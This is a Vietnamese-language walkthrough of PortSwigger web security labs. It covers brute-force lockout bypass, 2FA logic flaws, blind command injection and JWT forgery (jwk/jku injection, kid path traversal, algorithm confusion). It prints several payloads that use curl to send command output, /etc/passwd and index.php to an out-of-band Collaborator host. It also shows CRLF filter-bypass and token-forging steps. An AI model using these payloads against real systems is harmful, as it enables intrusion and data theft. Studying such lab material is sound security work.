# Authentication & Command Injection & JWT ## Broken brute-force protection, IP block ![](https://i.imgur.com/k4edmA5.png) Nếu ta brute-force passwd như thường sẽ bị block ![](https://i.imgur.com/gCwBu49.png) ![](https://i.imgur.com/IuT8HUJ.png) Tuy nhiên nếu ta brute-force xen kẽ với credentials đúng tức là: ``` wiener:peter carlos:123456 wiener:peter carlos:password ... wiener:peter carlos:moscow ``` thì được phép Do vậy ta tạo 2 wordlists bằng python và sử dụng pitchfork attack ![](https://i.imgur.com/CwCcYXa.png) ![](https://i.imgur.com/dP9a1Vi.png) và không quên để max concurrent requests là 1 để xử lý tuần tự nhé ![](https://i.imgur.com/jkBuRIe.png) Như vậy ta có thể tìm được passwd của carlos và solve lab ![](https://i.imgur.com/54hz9C1.png) ## Lab: 2FA broken logic Sau khi đăng nhập tại trang /login, hệ thống chuyển hướng chúng ta tới một trang mới /login2 để thực hiện xác thực mã code 2FA. Và hệ thống xác thực danh tính người dùng bằng cookie `verify=wiener` ![](https://i.imgur.com/9rpHkL4.png) ![](https://i.imgur.com/9ngQz1b.png) ![](https://i.imgur.com/riwoP0R.png) Ta sửa lại cookie và tiến hành brute-force mfa-code vì nó giới hạn 4 chữ số ![](https://i.imgur.com/iyiXsP2.png) ![](https://i.imgur.com/KZpHjwU.png) Sau 2 tiếng thử đi thử lại k nhận thấy status 302 nào :crying_cat_face: cuối cùng mới để ý trước đó phải GET `/login2` thì code mới trả về email. ![](https://i.imgur.com/7zfYCE7.png) ![](https://i.imgur.com/uCGNba5.png) Chọn `show response in browser` và copy vào burp browser ![](https://i.imgur.com/TPpzbhv.png) ![](https://i.imgur.com/LSxA2sk.png) # Command Injection ## Blind OS command injection with out-of-band data exfiltration Dựa vào đề bài ta biết bài blind cmdi này phải retrieve data ra bên ngoài, dựng sẵn `collaborator` của Burp rồi thử vài payload. `curl -d "ahihi" -X POST dbsilxn76d2rlatire1b2xofl6ryfn.oastify.com` ![](https://i.imgur.com/gshysp8.png) ![](https://i.imgur.com/fdiAAJZ.png) Như vậy ta đã gửi được request từ máy đến server. Muốn gửi data từ cmd ta sử dụng ```curl -d `whoami` -X POST dbsilxn76d2rlatire1b2xofl6ryfn.oastify.com``` ![](https://i.imgur.com/S25fAkc.png) ![](https://i.imgur.com/T6Icb3i.png) Hoặc ta có thể gửi file content ra ngoài `curl -F "file=@/etc/passwd" -X POST dbsilxn76d2rlatire1b2xofl6ryfn.oastify.com` ![](https://i.imgur.com/p01bY9f.png) Với lab này ta đơn giản chỉ sử dụng ![](https://i.imgur.com/yaDkN09.png) và có được username ![](https://i.imgur.com/2tNI0c6.png) ## Command injection - Filter bypass Bài này bị filter và áp dụng CRLF với payload `google.com%0Acurl+-X+POST+-d+@index.php+dbsilxn76d2rlatire1b2xofl6ryfn.oastify.com` ![](https://i.imgur.com/dYaJc6d.png) ![](https://i.imgur.com/pgmR319.png) ![](https://i.imgur.com/pffIOvF.png) ![](https://i.imgur.com/M8zTUR3.png) # JWT ## Lab: JWT authentication bypass via jwk header injection Trước tiên đăng nhập vào ta được cookie như trên ![](https://i.imgur.com/1JIkf6n.png) Cookie sử dụng thuật toán RS256, theo như tên lab ta sẽ đi inject `jwk` vào header. A JSON Web Key (JWK) is a JSON data structure that represents a set of public keys. Vậy thì nếu ta embedded JWK vào header thì server sẽ sử dụng nó như public key để verify cookie đã sign bằng private key của mình. Để làm điều đó ta có thể sử dụng Extension `JWT Editor Key` và `JSON WEB TOKEN` Đầu tiên là sinh RSA keys ![](https://i.imgur.com/1ywc7cj.png) Tiếp theo là sửa phần sub thành `administrator` và chọn `Embedded JWK` ![](https://i.imgur.com/5lve09c.png) ![](https://i.imgur.com/0YpFZjW.png) Sử dụng cookie đó đăng nhập là ta có thể solve lab ![](https://i.imgur.com/8O7bSvP.png) ## Lab: JWT authentication bypass via jku header injection Lab này ta cũng inject ở header điểm khác biệt là thay vì sử dụng `jwk` thì ta sử dụng `jku` jku nhận URL chứa Public key(giống external DTD) Vì vậy nếu ta sửa đổi đường dẫn URL đến web server ta kiểm soát thì ta hoàn toàn có thể làm giả được cookie. Copy Public key ![](https://i.imgur.com/hirGaTM.png) Store trên server ![](https://i.imgur.com/5mBAfnk.png) Sửa header và payload ![](https://i.imgur.com/OVCCjyG.png) ![](https://i.imgur.com/eBdu36X.png) Và ta dùng cookie mới để solve lab ![](https://i.imgur.com/KYOsqJB.png) ## Lab: JWT authentication bypass via kid header path traversal Theo mô tả của đề bài ta sẽ sửa `kid header` để excute path traversal `kid` (KEY ID) - Cung cấp ID mà máy chủ có thể sử dụng để xác định khóa chính xác trong trường hợp có nhiều khóa để chọn. Nó được sử dụng để khớp với một khóa cụ thể. Vì cookie được ký bằng HS256 ![](https://i.imgur.com/NpqUFhJ.png) nên đầu tiên ta sẽ tạo Symetric Key ![](https://i.imgur.com/OjgjpB1.png) Param `k` là `AA==` là key = null byte để server có thể decrypt Sửa tham số `kid` thành `../../../../../../../dev/null` ![](https://i.imgur.com/Z3S1ldj.png) Khi decrypt jwt, nó sẽ đi tìm kid ở vị trí đó và check xem có file đó không, đó là lý do ta đổi thành file đó. (Ở phần param `kid` này ta nên nghi ngờ nơi đây có thể dẫn tới SQLi hoặc CMDi.) sau đó ta sign jwt là có thể solve lab ![](https://i.imgur.com/VJ0rVfb.png) Điểm mấu chốt để thành công là `k` phải là null byte và `kid` phải trỏ về file có sẵn,thế nhưng mặc dù đã thử thay `kid` thành `../../../../../../etc/passwd` rồi nhưng không được. ## Lab: JWT authentication bypass via algorithm confusion Ta có file json public key ![](https://i.imgur.com/5xCH43I.png) Sau đó ta tạo public key bằng cách paste vô ![](https://i.imgur.com/eRVuqEc.png) ![](https://i.imgur.com/awQ6AXy.png) Chuyển sang base64 ![](https://i.imgur.com/kjkLF4M.png) Tạo symetric key với key base64 vừa chuyển ![](https://i.imgur.com/haAzgUM.png) ![](https://i.imgur.com/iINS1n9.png) ![](https://i.imgur.com/4Z0umwq.png) ## Lab: JWT authentication bypass via algorithm confusion with no exposed key Với lab này ta không có public key nữa vì vậy ta phải đi tìm public key. Bởi vì server chắc chắn khi ký sử dụng 1 private key, nên ta sẽ recover e, n từ ít nhất 1 cặp JWT ![](https://i.imgur.com/00tZFcC.png) Lấy 2 trường hợp n số lẻ(mà th code script gà quá, k loại luôn đi) đi thử và được kết quả ![](https://i.imgur.com/lO2gHsB.png)